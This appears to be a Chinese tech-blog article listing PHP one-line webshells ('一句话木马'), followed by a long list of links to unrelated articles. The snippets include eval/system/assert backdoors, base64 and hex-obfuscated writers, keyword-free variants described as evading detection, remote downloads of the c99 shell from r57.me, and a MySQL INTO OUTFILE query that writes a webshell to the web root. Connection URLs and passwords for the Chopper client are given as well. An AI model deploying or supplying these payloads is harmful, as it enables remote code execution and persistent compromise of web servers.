PHP与SQL语句写一句话木马总结
时间:2022-07-27
本文章向大家介绍PHP与SQL语句写一句话木马总结,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
一、基础类的一句话–功能仅限于验证漏洞了,实际中非常容易被查出出来:
<?php @eval($_GET["code"])?
<?php @system($_POST["cmd"])?
二、编码的替换的类型:
<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?
//会生成<?php @eval($_POST['lostwolf']);?
<script language="php" @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script
//php在html内部的一种嵌入方式
<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace(''a'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION['theCode']))','a');?
三、其他类型:
<?php $_GET[a]($_GET[b]);?
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
<?php assert($_REQUEST["pass"]);? //菜刀连接 躲避检测 密码pass
<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?
//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass
四、下载类型:
<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?
<? echo file_get_contents("..//cfg_database.php");? //显示某文件
<? eval ( file_get_contents("远程shell")) ? //运行远程shell
五、无关键函数类型:
<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?
http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass
<?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?
六、补充知识点:
SQL写一句话(MySQL):
select "<?php @system($_POST["pass"]);? " into outfile "/home/webaccount/projectname/www/*.php"
#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以
以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,感谢大家的学习和对ZaLou.Cn的支持。
- 2018年12大顶级云安全威胁
- 缤果盒子为域名意识打call 六位数秒下bingobox.com
- 用Qt写软件系列二:QCookieViewer(浏览器Cookie查看器)
- 用Qt写软件系列一:QCacheViewer(浏览器缓存查看器)
- 用Qt写软件系列三:一个简单的系统工具(上)
- ChartDirector应用笔记(三)
- 汇编语言 手记9
- 程序员一年写百万行代码是什么体验?这肯定是个Bug
- ChartDirector应用笔记(二)
- ChartDirector应用笔记(一)
- DB Cache
- oracle多用户并发及事务处理
- 数据中心整合会导致更高的云价格吗?
- Linux下oracle开机自启动服务
- php概述
- php教程
- php环境搭建
- PHP书写格式
- php变量
- php常量
- PHP注释
- php数组
- php字符串 string
- PHP整型 integer
- PHP浮点型 float
- php布尔型
- php数据类型之数组
- php数据类型之对象
- php数据类型之null
- php数据类型之间的转换
- php运算符
- php表达式
- PHP循环控制
- PHP流程控制
- php函数
- php全局变量
- PHP魔术变量
- php命名空间
- php 日期
- PHP包含文件
- php文件
- PHP 文件上传
- php Cookies
- php Sessions
- php email
- php安全email
- php错误处理
- PHP异常处理
- php过滤器
- PHP 高级过滤器
- php json
- php 表单
- PHP MySQL 简介
- PHP 连接 MySQL
- php创建数据库
- php 创建表
- php mysq 插入数据
- PHP MySQL 插入多条数据
- PHP MySQL 预处理语句
- php mysql 读取数据
- php mysql where
- PHP MySQL Order By
- PHP MySQL Update
- PHP MySQL Delete
- php ODBC
- 一行代码如何隐藏 Linux 进程?
- SSH 只能用于远程 Linux 主机?那说明你见识太小了!
- 干货 | Trip.com 机票React Native整洁架构2.0实践
- 干货 | 日均TB级数据,携程支付统一日志框架
- 为什么 HTTPS 是安全的?
- Hello World背后的故事:如何在Linux上编译C语言程序
- 浅谈Linux的动态链接库
- 初识ABP vNext(9):ABP模块化开发-文件管理
- NIFI里你用过PutDatabaseRecord嘛?
- NIFI里的数据库连接池
- 数据抽取的常见理论方法
- 万字讲解API网关的来龙去脉
- python+GDAL+numpy,点图层提取栅格像元数据
- 继续上一次的遥感影像镶嵌,这次使用gdal_merge.py
- R海拾遗-apply家族学习